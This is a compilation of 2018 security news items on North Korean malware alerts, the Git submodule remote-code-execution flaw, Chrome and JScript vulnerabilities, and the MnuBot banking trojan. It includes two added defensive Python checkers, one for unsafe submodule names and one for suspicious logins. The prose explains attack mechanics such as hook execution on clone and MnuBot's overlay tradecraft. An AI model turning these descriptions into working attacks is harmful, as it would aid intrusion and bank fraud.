US-CERT issued an alert on two malware associated with North Korea-linked APT Hidden Cobra
30.5.2018 securityaffairs APT  

The Department of Homeland Security (DHS) and the FBI issued a joint technical alert on two strains of malware, the Joanap backdoor Trojan and the Brambul Server Message Block worm, associated with the HIDDEN COBRA North Korea-linked APT group.

The US-CERT alert reads:

“Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with two families of malware used by the North Korean government:

a remote access tool (RAT), commonly known as Joanap; and
a Server Message Block (SMB) worm, commonly known as Brambul.”
“The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.”

The government experts have identified a range of IP addresses and other indicators of compromise (IOCs) associated with the two families of malware.

The first threat, tracked as “Joanap”, is a two-stage RAT that uses peer-to-peer communications to manage botnets and perform malicious activities such as data exfiltration, installation of further payloads and establishing proxy communications on compromised Windows systems.

“Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device.” states the alert.

The second malware analyzed by the government researchers is a Windows 32-bit Server Message Block (SMB) worm called “Brambul”.

Brambul is delivered as a service dynamic link library (DLL) file or a portable executable file, often dropped and installed onto target networks by dropper malware.

“When executed, the malware attempts to establish contact with victim systems and IP addresses on victims’ local subnets. If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks.” states the alert.

Network administrators could use the IOCs included in the alert to detect both Joanap and Brambul malware and prevent infections.


Expert found a zero-day RCE in Microsoft Windows JScript component
30.5.2018 securityaffairs
Vulnerability

Dmitri Kaslov, a security researcher at Telspace Systems, discovered a vulnerability in the JScript component of the Windows operating system that can be exploited by an attacker to execute malicious code on a target computer.
Kaslov disclosed the zero-day flaw through the Trend Micro Zero-Day Initiative (ZDI) back in January, then ZDI experts reported it to Microsoft.

After four months, Microsoft had yet to roll out a patch addressing the flaw, so ZDI decided to publish part of its technical analysis of the vulnerability.

ZDI usually waits 120 days before publicly disclosing a flaw.

“This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” reads the advisory published by ZDI.

“The specific flaw exists within the handling of Error objects in JScript. By performing actions in script, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.”

The vulnerability received a 6.8 rating out of 10 on the CVSSv2 severity scale.

To exploit the vulnerability, the attacker has to trick victims into visiting a malicious web page or into downloading and opening a malicious JS file on the system.

The good news is that the vulnerability does not allow a full system compromise on its own, because attackers can execute malicious code only within a sandboxed environment.

Of course, an attacker can chain this vulnerability with a sandbox bypass exploit and then execute their own code on the target system.

Microsoft is working on a security update.

Below is the timeline for the vulnerability:

01/23/18 – ZDI sent the vulnerability report to the vendor
01/23/18 – The vendor acknowledged and provided a case number
04/23/18 – The vendor replied that they were having difficulty reproducing the issue report without POC
04/24/18 – ZDI confirmed the POC was sent with the original and sent it again
05/01/18 – The vendor acknowledged receipt of the POC
05/08/18 – The vendor requested an extension
05/18/18 – ZDI replied “We have verified that we sent the POC with the original. The report will 0-day on May 29.”

ZDI confirmed that it was not aware of attempts in the wild to exploit this vulnerability.


FireMon to Acquire Cyber Situational Awareness Firm Lumeta
30.5.2018 securityweek IT 

Network security policy management solutions provider FireMon announced on Tuesday that it has entered an agreement to acquire Lumeta, a company that specializes in cyber situational awareness.

The financial terms of the deal, expected to be completed in the second quarter of 2018, have not been disclosed.

Lumeta’s products provide organizations with real-time network and device visibility and security monitoring, including for IoT and industrial control systems (ICS). The company also helps customers identify and remediate leak paths and segmentation violations.

Lumeta technology can continuously identify new devices and cloud connectivity, allowing FireMon to extend the capabilities of its own platform to previously unknown network and cloud elements. This should help reduce attack surface and expose activity that may represent a security risk, FireMon said.

“Lumeta and FireMon share a vision for deeper integration across the security industry. For example, Lumeta built Spectre with two-way RESTful APIs, which has resulted in proven integrations with leading security vendors, including McAfee ePO, IBM QRadar, Carbon Black, Cisco, Tenable, InfoBlox and Qualys. This pairs well with FireMon’s vendor-agnostic approach to solving customers’ problems,” said Satin Mirchandani, CEO of FireMon. “Additionally, Lumeta’s history, which dates back to the legendary innovation center Bell Labs, perfectly complements FireMon’s business model and technology strategy.”

FireMon says Lumeta will remain a standalone business, and its current president, Reggie Best, will continue to fill the position. FireMon also plans to invest in the development of Lumeta’s technology and its integration with FireMon’s own products.

Lumeta is not the first company acquired by FireMon. It bought Immediate Insight in 2015 and in 2016 it acquired cloud security firm FortyCloud.


Remote Code Execution Vulnerability Patched in Git
30.5.2018 securityweek 
Vulnerability

Updates released on Tuesday for the Git version control system patch two security flaws, including a serious vulnerability that can be exploited for remote code execution using specially crafted repositories.

The security holes, tracked as CVE-2018-11235 and CVE-2018-11233, have been addressed with the release of Git v2.17.1, v2.13.7, v2.14.4, v2.15.2 and v2.16.4.

The more serious of them, CVE-2018-11235, is related to submodule names and recursively cloning repositories. The issue was discovered by Etienne Stalmans, who reported it through GitHub’s bug bounty program.

Microsoft’s Visual Studio Team Services (VSTS) team has provided some information about the vulnerability, instructions on how users can check if they are impacted, and the steps that need to be taken to mitigate the risks on each platform.

Edward Thomson, a program manager for Git in Microsoft Visual Studio Team Services, has provided the following description of the vulnerability:

“When a Git repository contains a submodule, that submodule's repository structure is stored alongside the parent's, inside the .git folder. This structure is generally stored in a folder with the same name as the submodule, however the name of this folder is configurable by a file in the parent repository.

Vulnerable versions of git allow the folder name to contain a path that is not necessarily beneath the .git directory. This can allow an attacker to carefully create a parent repository that has another Git repository checked in, as a folder inside that parent repository. Then that repository that's checked in can be added as a submodule to the parent repository. That submodule's location can be set outside of the .git folder, pointing to the checked-in repository inside the parent itself.

When you recursively clone this parent repository, Git will look at the submodule that has been configured, then look for where to store that submodule's repository. It will follow the configuration into the parent repository itself, to the repository that's been checked in as a folder. That repository will be used to check out the submodule… and, unfortunately, any hooks in that checked-in repository will be run.

So the attacker can bundle this repository configuration with a malicious post-checkout hook, and their code will be executed immediately upon your (recursive) clone of the repository.”

Microsoft, GitLab, GitHub and likely other Git hosting providers have taken steps to prevent abuse. However, users have still been advised to update their Git clients.
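As an added illustration of the problem Thomson describes (not Git's own code or Microsoft's check), the following script parses a `.gitmodules` file and flags submodule names that would place the submodule's repository outside the parent's `.git/modules` directory. The `.gitmodules` content is constructed for the example, and the "unsafe name" rule is a heuristic modelled on the description above rather than Git's exact implementation.

```python
"""Pre-clone check for submodule names that escape .git/modules (added example)."""
import re

# Constructed .gitmodules content: one ordinary submodule and one whose
# *name* (not its path) climbs out of the parent's .git/modules directory.
SAMPLE_GITMODULES = """\
[submodule "lib/safe"]
\tpath = lib/safe
\turl = https://example.invalid/safe.git
[submodule "../../escape"]
\tpath = vendor/escape
\turl = ./vendor/escape
"""

SECTION_RE = re.compile(r'^\s*\[submodule\s+"([^"]*)"\]\s*$')
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')


def parse_gitmodules(text):
    """Return an ordered list of (name, {key: value}) for each submodule section.

    Minimal parser for the git-config syntax used by .gitmodules; comments are
    skipped, while quoting and line continuations are not handled (not needed here).
    """
    modules = []
    current = None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("#", ";")):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = {}
            modules.append((m.group(1), current))
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2)
    return modules


def is_unsafe_submodule_name(name):
    """Heuristic modelled on the issue described above: a name is unsafe if it
    is empty, absolute, or contains a '..' path component (either separator)."""
    if not name:
        return True
    parts = re.split(r"[\\/]", name)
    if parts[0] == "" or re.fullmatch(r"[A-Za-z]:", parts[0]):
        return True  # "/abs" style or "C:" drive-qualified name
    return any(part == ".." for part in parts)


def find_unsafe_submodules(text):
    """Names from a .gitmodules file whose submodule repository would be stored
    outside the parent's .git/modules directory."""
    return [name for name, _ in parse_gitmodules(text)
            if is_unsafe_submodule_name(name)]


if __name__ == "__main__":
    for name in find_unsafe_submodules(SAMPLE_GITMODULES):
        print(f"unsafe submodule name: {name!r}")
```

Updating the Git client remains the actual fix; a check like this is only a way to inspect a repository's `.gitmodules` (for example on a hosting server, or before running a recursive clone with an old client) for names of the kind the advisory describes.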

The second flaw is considered less serious. The issue is related to Git performing “path sanity-checks on NTFS that can be fooled into reading arbitrary memory.”


Vulcan Cyber Emerges From Stealth With $4 Million Seed Round
30.5.2018 securityweek IT 

Vulcan Cyber is the latest Israel-based cybersecurity startup to emerge from stealth mode. The company, whose main product is a vulnerability remediation platform, announced on Wednesday that it raised $4 million in seed funding.

The funding round was led by YL Ventures with participation from other investors. Vulcan Cyber will use the seed funds to build its Israeli R&D office, which will develop and deliver its product, and kickstart operations in the U.S., with a focus on sales, marketing, support and professional services.

A beta version of the platform is already available to qualified customers and is expected to become generally available in late 2018.

Studies have shown that it can take organizations a long time to patch vulnerabilities in the software they use and it’s not uncommon for known flaws to be exploited in high profile attacks that end up costing companies millions of dollars.

Vulcan Cyber aims to address the vulnerability remediation gap by providing a platform that integrates with existing security assessment, DevOps and IT tools, allowing organizations to detect vulnerabilities and automate the remediation process. The list includes tools from AWS, Nessus, WhiteHat, Qualys, IBM, BlackDuck, Tripwire, Checkmarx, Rapid7, Veracode, Google, Microsoft, GitHub, Slack and many others.

The solution provides an orchestration engine that helps coordinate the teams, tasks and tools needed to address vulnerabilities, the company says.

Vulcan says its goal is to build the largest vulnerability remediation database, including patches, automated scripts and signatures.

The company claims that unlike competitors, whose products assess and prioritize flaws strictly based on threat intelligence, its platform also leverages DevOps and IT data.

The product is aimed at CIOs and CISOs who want to get a clear picture of the risk level across their organization, and individuals responsible for vulnerability management programs, as it allows them to better manage the remediation process and improve efficiency by automating certain tasks.

Vulcan says its cloud-based platform is easy to deploy – it does not require any agents or tapping into network traffic, and organizations only need to provide the API and credentials for their vulnerability assessment, DevOps and IT tools.


Chrome 67 Patches 34 Vulnerabilities
30.5.2018 securityweek 
Vulnerability

Google this week released Chrome 67 to the stable channel to provide various improvements, including patches for 34 vulnerabilities.

After introducing it in Chrome 63 in December, Google is now making Site Isolation available for more users. The functionality ensures that each opened website is rendered in a separate process, thus isolating it from the processes of other websites and delivering stronger security boundaries.

Chrome’s Site Isolation was also meant as a form of mitigation against the web-exploitable Spectre vulnerability affecting modern micro-processors. Since the beginning of the year, together with Meltdown, another CPU flaw, Spectre has fueled an industry-wide race to release patches and mitigations.

“We're continuing to roll out Site Isolation to a larger percentage of the stable population in Chrome 67. Site Isolation improves Chrome's security and helps mitigate the risks posed by Spectre,” Google notes in a blog post.

Of the 34 security fixes delivered in the new browser release, 24 are for vulnerabilities reported by external researchers. These include 9 flaws rated High severity, 12 assessed with a Medium risk, and 3 considered Low severity.

The most important issues addressed in Chrome 67 include Use after free in Blink (CVE-2018-6123), Type confusion in Blink (CVE-2018-6124), Overly permissive policy in WebUSB (CVE-2018-6125), Heap buffer overflow in Skia (CVE-2018-6126), Use after free in indexedDB (CVE-2018-6127), uXSS in Chrome on iOS (CVE-2018-6128), Out of bounds memory access in WebRTC (CVE-2018-6129 and CVE-2018-6130), and Incorrect mutability protection in WebAssembly (CVE-2018-6131).

The Medium severity bugs addressed in this release include Use of uninitialized memory in WebRTC, URL spoof in Omnibox, Referrer Policy bypass in Blink, UI spoofing in Blink, Out of bounds memory access in V8, Leak of visited status of page in Blink, Overly permissive policy in Extensions, Restrictions bypass in the debugger extension API, Heap buffer overflow in Skia, and Out of bounds memory access in V8.

Google also addressed Out of bounds memory access in PDFium, Incorrect escaping of MathML in Blink, and Password fields not taking advantage of OS protections in Views.

The search engine giant paid over $30,000 in bug bounties to the reporting security researchers. However, the company has yet to publish full details on the rewards.


U.S. Commerce Chief Warns of Disruption From EU Privacy Rules
30.5.2018 securityweek Privacy 

Washington - US Commerce Secretary Wilbur Ross warned Wednesday that the new EU privacy rules in effect since last week could lead to serious problems for business, medical research and law enforcement on both sides of the Atlantic.

Ross said US officials were "deeply concerned" about how the General Data Protection Regulation would be implemented, while noting that the guidance so far has been "too vague."

The law, which took effect May 25, establishes the key principle that individuals must explicitly grant permission for their data to be used, and gives consumers the right to know who is accessing their information and what it will be used for.

Some US officials have expressed concerns about the GDPR, but Ross is the highest ranking official to speak on the law, and his comments address a broad range of sectors that could be affected.

"We do not have a clear understanding of what is required to comply. That could disrupt transatlantic cooperation on financial regulation, medical research, emergency management coordination, and important commerce," Ross said in an opinion piece for the Financial Times.

The costs of the new law could be significant, to the point where it may "threaten public welfare on both sides of the Atlantic," according to Ross.

"Complying with GDPR will exact a significant cost, particularly for small and medium-sized enterprises and consumers who rely on digital services and may lose access and choice as a result of the guidelines," he wrote.

"Pharmaceutical companies may not be able to submit medical data from drug trials involving European patients to US authorities, which could delay the approval of new life-saving drugs."

He added that the US Postal Service has claimed the new rules could prevent EU postal operators from providing the data needed to process inbound mail.

Ross also echoed concerns from other officials that the EU requirement that personal data be restricted from the internet address book known as "WHOIS" could hurt law enforcement efforts to crack down on cybercrime and online calls to violence.

"That could stop law enforcement from ascertaining who is behind websites that propagate terrorist information, sponsor malicious botnets or steal IP addresses," he said.

"These important activities need to be weighed carefully against privacy concerns. They are critical to building trust in the internet, safeguarding infrastructure, and protecting the public. Our respect for privacy does not have to come at the expense of public safety."


U.S. Attributes Two More Malware Families to North Korea
30.5.2018 securityweek 
Virus 

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have issued another joint technical alert on the North Korea-linked threat group known as Hidden Cobra.

The latest alert attributes the Joanap backdoor trojan and the Brambul worm to the North Korean government. It provides IP addresses and other indicators of compromise (IoC) associated with these threats in an effort to help organizations protect their networks against attacks.

The threat actor tracked by the U.S. government as Hidden Cobra is known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including ones targeting Sony Pictures, Bangladesh’s central bank and various financial organizations. Some of the group’s campaigns are tracked as Operation Blockbuster, Dark Seoul and Operation Troy. Five Eyes countries have also officially blamed Lazarus for the WannaCry attack.

According to the DHS and FBI, Joanap and Brambul have been used by Hidden Cobra since at least 2009 in attacks aimed at organizations in the United States and elsewhere, including in the media, financial, aerospace and critical infrastructure sectors.

Joanap is a two-stage malware that allows hackers to exfiltrate data and install other threats on the system.

Brambul is a worm that abuses the Server Message Block (SMB) protocol to spread to other systems through dictionary attacks. Its list of capabilities also includes harvesting system information (which it sends to the attackers via email), accepting command-line arguments, and executing what analysts call a “suicide script.”

The DHS and the FBI have published several alerts in the past year describing Hidden Cobra tools, including Sharpknot, Hardrain, Badcall, Bankshot, Fallchill, Volgmer, and Delta Charlie.

North Korea has been blamed for several major attacks, but Pyongyang has always denied the accusations. On the other hand, threat actors linked to North Korea don’t seem to be deterred by accusations and the numerous reports published in the past years by cybersecurity companies, and they continue launching attacks, including with new tools and zero-day exploits.


Open Source Tool From FireEye Helps Detect Malicious Logins
30.5.2018 securityweek 
Virus

FireEye has released GeoLogonalyzer, an open source tool that can help organizations detect malicious logins based on geolocation and other data.

Many organizations need to allow their employees to connect to enterprise systems from anywhere in the world. However, threat actors often rely on stolen credentials to access a targeted company’s systems.

Distinguishing legitimate logins from malicious ones can be challenging, but FireEye hopes to help solve the problem with GeoLogonalyzer, which leverages what the company calls GeoFeasibility.

GeoLogonalyzer analyzes authentication logs containing timestamps, usernames, and IP addresses, and highlights any changes in a user's login source, along with related anomalies, data center hosting information, location data, ASN information, and time and distance metrics.

GeoFeasibility looks at the location of the user who initiated a login in an effort to determine if the login is suspicious or not. For example, if a user connects to a company VPN from the United States, they are unlikely to connect to the VPN from Australia a few minutes later.

In addition to checking if accounts authenticate from two distant geographical locations in a short timeframe, GeoLogonalyzer looks at accounts that usually log in from IP addresses registered to one physical location, but also authenticate from places where the user is unlikely to be.

Logins from a foreign location where no employees reside or are expected to travel to, and where the organization does not have any business contacts will also raise a red flag.

Less obvious login patterns may also be considered suspicious, including user accounts that typically log in from one IP address, subnet or ASN, but also have a small number of logins from a different source, or ones that log in from IP addresses registered to cloud server hosting providers. Users who log in from multiple source hostnames or with multiple VPN clients are also considered suspicious.
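As an added example (not FireEye's GeoLogonalyzer code), the two checks described above, impossible travel between consecutive logins and logins from cloud hosting space, run over a constructed CSV authentication log. The `GEO` table stands in for a GeoIP database, and `HOSTING_NETWORKS`, the 1000 km/h threshold and all sample addresses are assumptions made for the example.

```python
"""Impossible-travel and hosting-provider login checks (added example)."""
import csv
import io
import ipaddress
import math
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample authentication log: timestamp,user,ip (UTC timestamps)
SAMPLE_LOG = """\
timestamp,user,ip
2018-05-29T08:00:00Z,alice,198.51.100.10
2018-05-29T08:05:00Z,alice,203.0.113.5
2018-05-29T09:00:00Z,bob,198.51.100.20
2018-05-29T17:30:00Z,bob,192.0.2.7
2018-05-29T10:00:00Z,carol,198.51.100.30
2018-05-29T10:20:00Z,carol,203.0.113.200
"""

# Constructed stand-in for a GeoIP database: ip -> (country, latitude, longitude)
GEO = {
    "198.51.100.10": ("US", 40.7128, -74.0060),   # New York
    "203.0.113.5":   ("AU", -33.8688, 151.2093),  # Sydney
    "198.51.100.20": ("US", 37.7749, -122.4194),  # San Francisco
    "192.0.2.7":     ("US", 34.0522, -118.2437),  # Los Angeles
    "198.51.100.30": ("US", 41.8781, -87.6298),   # Chicago
    "203.0.113.200": ("US", 41.8781, -87.6298),   # Chicago, hosting range
}
# Constructed list of networks treated as cloud/hosting-provider address space
HOSTING_NETWORKS = [ipaddress.ip_network("203.0.113.192/26")]

MAX_PLAUSIBLE_KMH = 1000.0  # assumed threshold: roughly airliner cruising speed


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two latitude/longitude points."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def parse_log(text):
    """Parse CSV login records into (datetime, user, ip) tuples."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        ts = datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts.replace(tzinfo=timezone.utc), row["user"], row["ip"]))
    return events


def is_hosting_ip(ip):
    """True if the address falls in a known hosting-provider network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in HOSTING_NETWORKS)


def analyze_logins(text):
    """Return findings: impossible travel between consecutive logins of the
    same user, and logins sourced from hosting-provider networks."""
    findings = []
    by_user = defaultdict(list)
    for ts, user, ip in parse_log(text):
        by_user[user].append((ts, ip))
        if is_hosting_ip(ip):
            findings.append({"user": user, "kind": "hosting_provider",
                             "detail": f"{ip} at {ts.isoformat()}"})
    for user, logins in by_user.items():
        logins.sort()
        for (t1, ip1), (t2, ip2) in zip(logins, logins[1:]):
            if ip1 not in GEO or ip2 not in GEO:
                continue  # no location data; feasibility cannot be judged
            _, lat1, lon1 = GEO[ip1]
            _, lat2, lon2 = GEO[ip2]
            dist = haversine_km(lat1, lon1, lat2, lon2)
            if dist == 0:
                continue  # same geolocation is always feasible
            hours = (t2 - t1).total_seconds() / 3600.0
            # Zero elapsed time over a non-zero distance is treated as infinite speed.
            speed = dist / hours if hours > 0 else math.inf
            if speed > MAX_PLAUSIBLE_KMH:
                findings.append({"user": user, "kind": "impossible_travel",
                                 "detail": f"{ip1} -> {ip2}: {dist:.0f} km in "
                                           f"{hours * 60:.0f} min ({speed:.0f} km/h)"})
    return findings


if __name__ == "__main__":
    for f in analyze_logins(SAMPLE_LOG):
        print(f"{f['user']:<6} {f['kind']:<18} {f['detail']}")
```

On the sample data, alice's New York to Sydney pair five minutes apart is flagged as impossible travel and carol's login from the hosting range is flagged, while bob's San Francisco to Los Angeles pair over eight and a half hours is not.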

Additional information and usage instructions are available on GitHub and FireEye’s blog post.


Europol Creates Dark Web Investigations Team
30.5.2018 securityweek BigBrothers

The European Union’s law enforcement agency today announced the creation of a dedicated team that will be investigating activity across the dark web.

The newly established Dark Web Investigations Team, embedded within Europol’s European Cybercrime Centre (EC3), is the result of a Europol initiative “to create a coordinated law enforcement approach to tackle crime on the dark web.”

The dedicated team will have participation from EU law enforcement agencies, operational third parties, and other relevant partners.

Through EC3, Europol has long supported investigations of criminal marketplaces on the dark web, and last year it helped with the takedown of some of the largest dark web markets, such as AlphaBay.

Many critical marketplaces for criminal organizations and individual illegal activities worldwide are hosted on the dark web, the law enforcement agency points out. Such underground markets represent fertile environments for criminals, as they offer the possibility to buy and sell anonymously.

Shut down last year, AlphaBay and Hansa, two of the largest underground marketplaces, were reportedly responsible for the trading of over 350,000 illicit goods, including drugs, firearms and cybercrime tools such as malware.

The successful takedown of these dark web portals resulted in a decreased volume of transactions and in some traders leaving the dark web platform due to anxiety, uncertainty, and the risks regarding the level of anonymity, Europol notes. Many vendors “were not inclined to open them again,” and the distrust between vendors and buyers has increased.

The newly established dedicated Dark Web Team “will deliver a complete, coordinated approach: sharing information, providing operational support and expertise in different crime areas and the development of tools, tactics, and techniques to conduct dark web investigations and identify top threats and targets. The team also aims to enhance joint technical and investigative actions, organize training and capacity-building initiatives, together with prevention and awareness-raising campaigns – a 360° strategy against criminality on the dark web,” Europol says.


Accused Yahoo Hacker Gets Five Years in Prison, Fine
30.5.2018 securityweek Crime

A man accused of taking part in devastating cyberattacks on Yahoo for Russian intelligence agents was sentenced Tuesday to five years in prison in a plea bargain with prosecutors.

The deal struck by 23-year-old Karim Baratov, who immigrated to Canada from Kazakhstan, also resulted in a fine that "encompasses all his remaining assets," the US Justice Department said in a statement.

Baratov has been in American custody since being extradited from Canada last year on a US warrant for hacking, commercial espionage and related crimes.

US authorities allege Russian intelligence agents hired Baratov and another hacker to carry out attacks on Yahoo from 2014 to 2016.

The data breach compromised 500 million Yahoo accounts and is one of the largest cyberattacks in history.

"The sentence imposed reflects the seriousness of hacking for hire," said prosecutor Alex Tse.

"Hackers such as Baratov ply their trade without regard for the criminal objectives of the people who hire and pay them."

Targets included Russian and US government officials, cyber security, diplomatic and military personnel, journalists, companies and financial firms.

"It's difficult to overstate the unprecedented nature of this conspiracy, in which members of a foreign intelligence service directed and empowered criminal hackers to conduct a massive cyber-attack against 500 million victim user accounts," said John Bennett, FBI special agent in charge for the San Francisco field office.


At least 90,000 Canadian bank customers may have been affected by two data breaches
30.5.2018 securityaffairs Incident

On Monday, two of Canada’s five largest banks, the Bank of Montreal (BMO) and Simplii Financial, informed their customers that they are investigating a data breach.
The security breach suffered by the Bank of Montreal (BMO) may have impacted fewer than 50,000 of its 8 million customers, while the incident suffered by Simplii Financial may have exposed information on 40,000 clients.

“Two Canadian banks warned Monday they have been targeted by hackers, and that the personal information of tens of thousands of customers may have been stolen — something that appeared to be confirmed in a letter to the media from someone who said they were demanding a $1-million ransom from the banks.” reads the post published by CBC.

“CIBC-owned Simplii Financial was the first to warn on Monday morning that hackers had accessed the personal and account information of more than 40,000 of the bank’s customers.”

Exposed data allegedly includes social insurance numbers, dates of birth, and financial information.

In both cases, the hackers contacted the bank in a blackmail attempt, requesting a $1 million ransom from each bank to avoid data disclosure.

BMO ruled out insider involvement; it has contacted the authorities and notified potentially affected customers of the incident.

“On Sunday, May 27, fraudsters contacted BMO claiming that they were in possession of certain personal and financial information for a limited number of customers. We believe they originated the attack from outside the country.” reads a press release published by BMO.

“We took steps immediately when the incident occurred and we are confident that exposures identified related to customer data have been closed off. We have notified and are working with relevant authorities as we continue to assess the situation.”

Simplii has not yet confirmed the data breach but informed customers that it’s investigating the issue and has already implemented “enhanced online fraud monitoring and online banking security measures.”

“Simplii Financial is advising clients that it has implemented additional online security measures in response to a claim received on Sunday, May 27, 2018 that fraudsters may have electronically accessed certain personal and account information for approximately 40,000 of Simplii’s clients.” states the security advisory published by the bank.

“We’re taking this claim seriously and have taken action to further enhance our monitoring and security procedures,” said Michael Martin, Senior Vice-President, Simplii Financial. “We feel that it is important to inform clients so that they can also take additional steps to safeguard their information.”

The bank has reassured its customers that any economic damage will be fully reimbursed.

In addition, Simplii recommends that clients:

Always use a complex password and pin (e.g. not 12345)
Monitor their accounts for signs of unusual activity

At the time, we cannot exclude that the hackers were able to obtain customer data of the two Canadian banks in other ways, for example by collecting it from other data breaches or by targeting customers with spear-phishing campaigns.


New Banking Trojan MnuBot uses SQL Server for Command and Control
30.5.2018 securityaffairs 
Virus

Researchers at IBM X-Force Research team discovered a new Delphi-based banking Trojan dubbed MnuBot that leverages Microsoft SQL Server for communication with the command and control (C&C).
The MnuBot Trojan implements a two-stage attack flow and is composed of two main components, one for each stage.

In the first stage, the malware searches for a file called Desk.txt within the %AppData%Roaming folder.

If the file is not present, MnuBot creates it, creates a new desktop and switches the user workspace to that newly created desktop, which runs side by side with the legitimate user desktop.

MnuBot continually checks the foreground window name in the new desktop searching for bank names in its configuration, then it will query the server for the second stage executable according to the specific bank name that was found.

MnuBot implements the following capabilities:

Creating browser and desktop screenshots
Keylogging
Simulating user clicks and keystrokes
Restarting the victim machine
Uninstalling Trusteer Rapport from the system
Creating a form to overlay the bank’s forms and steal the data the user enters into the form

The malware downloads the second-stage payload as C:\Users\Public\Neon.exe; this binary contains the attack logic.

“the MnuBot malware uses a Microsoft SQL Server database server to communicate with the sample and send commands to be executed on the infected machine.” reads the report published by IBM.

“Like any other RAT, MnuBot needs to receive commands from the server. To do so, it constantly queries the Microsoft SQL database server for a new command.”

Once the malware has infected a system, it connects to the C&C server to fetch its initial configuration. Experts found the SQL server details (server address, port, username, and password) hardcoded inside the malware in encrypted form.

The configuration also includes:

Queries to be performed
Commands the malicious actor can send
Files MnuBot will interact with
Bank websites that are being targeted

If MnuBot is unable to access the configuration, it shuts itself down and performs no malicious activity on the infected machine.

MnuBot uses the configuration to dynamically change its malicious activity (e.g., the banking sites that are targeted) and to implement anti-research mechanisms.

Every time the attacker wants to send commands to the malware, they update specific columns inside a table stored in a database named jackjhonson.

“The attacker sends commands to the victims by updating specific columns inside a table called USUARIOCONTROLEXGORDO, which is stored in a database named jackjhonson.” continues the analysis.

“A few interesting columns include the following:

COMP_ACAO: This column identifies the type of command to be executed.
POSICAOMOUSE: In case the command is to simulate a user click, this column will be updated with the cursor position.
USER_IMAGEM: This column will be updated with the screenshot BMP image from the infected machine in case a screenshot was requested.
VALORINPUT: This column contains the input in case the command was input insertion.”
Like other malware families, MnuBot displays full-screen overlay forms to victims in order to trick them into providing sensitive data.

“Those forms are a type of social engineering to keep the user waiting. In the background, the cybercriminal takes control over the user endpoint and attempts to perform an illegal transaction via the victim’s open banking session.” concludes the report.

“MnuBot is an excellent example of many malware families in the Brazilian region. It holds many characteristics that are typical of other recently discovered malware strains. For example, the overlaying forms and the new desktop creation are well-known techniques that malware authors in the region use today.”


New Trojan Uses SQL Server for C&C
29.5.2018 securityweek Virus

A recently discovered banking Trojan leverages Microsoft SQL Server for communication with the command and control (C&C), IBM has discovered.

Dubbed MnuBot, the malware uses the database server for communication with the bot and to send commands to the infected machines. The Trojan features two components, each in charge of a different phase of a two-stage attack flow.

During the initial stage, the malware searches for a file called Desk.txt within the %AppData%\Roaming folder. This file lets MnuBot know which desktop is currently running; if it exists, the Trojan does nothing, because it knows it is already running in the new desktop.

If the file doesn’t exist, then MnuBot creates it and a new desktop, and then switches the user workspace to the new desktop, which runs alongside the legitimate user desktop.

On the newly created desktop, MnuBot constantly checks the foreground window name and, if it finds a name similar to a bank name in its configuration, the malware queries the server for the second stage executable corresponding to that bank name.

The executable, which is saved as C:\Users\Public\Neon.exe, is actually a Remote Access Trojan (RAT) that provides the attacker with full control over the target machine. It also includes functionality unique to MnuBot, IBM explains.

Once the infection stage has been completed, the malware connects to the C&C server to fetch the initial configuration. The necessary SQL server details, such as server address, port, username and password, are hardcoded inside the malware in an encrypted form (they are decrypted dynamically just before initializing the connection).

Strings in the configuration include queries the malware should perform, supported commands, files to interact with, and targeted bank websites. Should the configuration be missing, MnuBot shuts itself down, meaning no malicious activity is performed on the infected machine.

The attackers can dynamically change MnuBot’s malicious activity by modifying the configuration directly on the server, and can also prevent researchers from reverse engineering the malware sample behavior if the author takes the server down.

Once the user opens the webpage of a targeted website, the second-stage payload provides the malware operator with an open session to the bank’s website, directly from the victim machine.

The malware provides the operator with the ability to create browser and desktop screenshots, log keystrokes, simulate user clicks and keystrokes, restart the victim machine, uninstall Trusteer Rapport from the system, and create a form to overlay the bank’s page and steal the data the user enters there.

To send commands to the victim machine, the attacker updates specific columns inside a table stored in a database named jackjhonson. Columns there are meant to identify the type of command to be executed, to simulate a user click, to store screenshot bmp images from the infected machines in case a screenshot is needed, and to store the input required for input insertion commands.

MnuBot uses a full screen overlay form to prevent users from accessing the legitimate banking website and to trick them into revealing sensitive data. In the background, the malware operator takes control over the system and attempts to perform an illegal transaction via the already opened banking session.

The operator also asks the user for additional details if needed, using another overlaying form. The executable downloaded during the second stage of the attack contains the relevant social engineering forms the cybercriminals need for their nefarious operations.

MnuBot, which was observed targeting users in Brazil, is a great example of how malware authors constantly attempt to evolve their creations to evade regular anti-virus detection. In this case, they attempted to hide malicious network communications using seemingly innocent MS SQL traffic.


Flaws in IBM QRadar Allow Remote Command Execution
29.5.2018 securityweek Vulnerability

Three vulnerabilities discovered by a researcher in IBM’s QRadar product can be chained for an exploit that allows a remote and unauthenticated attacker to bypass authentication and execute arbitrary commands with root privileges.

IBM QRadar is an enterprise security information and event management (SIEM) product designed to help security analysts identify sophisticated threats on their network and improve incident remediation.

